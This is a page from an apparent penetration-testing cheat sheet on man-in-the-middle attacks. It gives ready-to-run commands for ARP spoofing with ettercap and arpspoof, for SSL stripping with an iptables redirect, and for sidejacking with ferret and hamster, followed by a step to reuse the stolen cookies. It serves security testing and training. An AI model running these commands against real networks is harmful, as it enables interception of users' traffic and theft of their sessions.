d4Rk's 1337 h4x0r guide
About me
Search…
Introduction
Reconnaissance
Recon
OSINT
Enumeration
Network discovery
Port scanning
Webserver scanning
Exploit detection
Fuzzing
Process monitoring
Exploitation
Shells
Passwords
Web
Buffer overflow
Misc
Privilege escalation
Linux
Windows
Post exploitation
Loot
Pivoting
Standalone Tools
Services
TCP
UDP
Misc
File transfer
Overview
Wget
Pure-FTPd
TFTP
VBScript: Wget clone
Misc
Bash
Burp Suite
Crypto
Ebowla
Firefox extensions
Impacket
Memory forensics
Metasploit Framework (MSF)
MITM
Msfvenom
Pass the Hash (PTH)
PowerShell
PowerShell on Linux
Wireshark
Wordlists and dictionaries
Bug Bounty
Platforms
Tools
Powered By GitBook
MITM

ARP Spoofing (IPv4)

Cain and Abel (Windows)

​oxid.it - Cain & Abel​

Ettercap (Linux)

1
ettercap -TqM arp: remote /<gateway-ip>/ /<target-ip>/
Copied!

Neighbor Advertisement Spoofing (IPv6)

Evil FOCA (Windows)

Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. Evil FOCA​

Sidejacking

Hamster/Ferret

Enable ip forwarding
1
echo "1" > /proc/sys/net/ipv4/ip_forward
Copied!
Modify ip tables for SSL Strip
1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
Copied!
Run SSL Strip
1
sslstrip -f -a -k -l 1000 -w /root/out.txt &
Copied!
Enable ARP spoof
1
arpspoof -i eth0 <gateway>
Copied!
Enable Ferret
1
ferret -i eth0
Copied!
Start hamster
1
hamster
Copied!
-> Use stolen cookies with e.g. FireFox Web Developer Addon -> Add Cookies

Firesheep

A Firefox extension that demonstrates HTTP session hijacking attacks. GitHub - codebutler/firesheep​

SSLStrip

A tool for exploiting Moxie Marlinspike's SSL "stripping" attack. GitHub - moxie0/sslstrip​
Misc - Previous
Metasploit Framework (MSF)
Next - Misc
Msfvenom
Last modified 7mo ago
Copy link
Edit on GitHub
Contents
ARP Spoofing (IPv4)
Cain and Abel (Windows)
Ettercap (Linux)
Neighbor Advertisement Spoofing (IPv6)
Evil FOCA (Windows)
Sidejacking
Hamster/Ferret
Firesheep
SSLStrip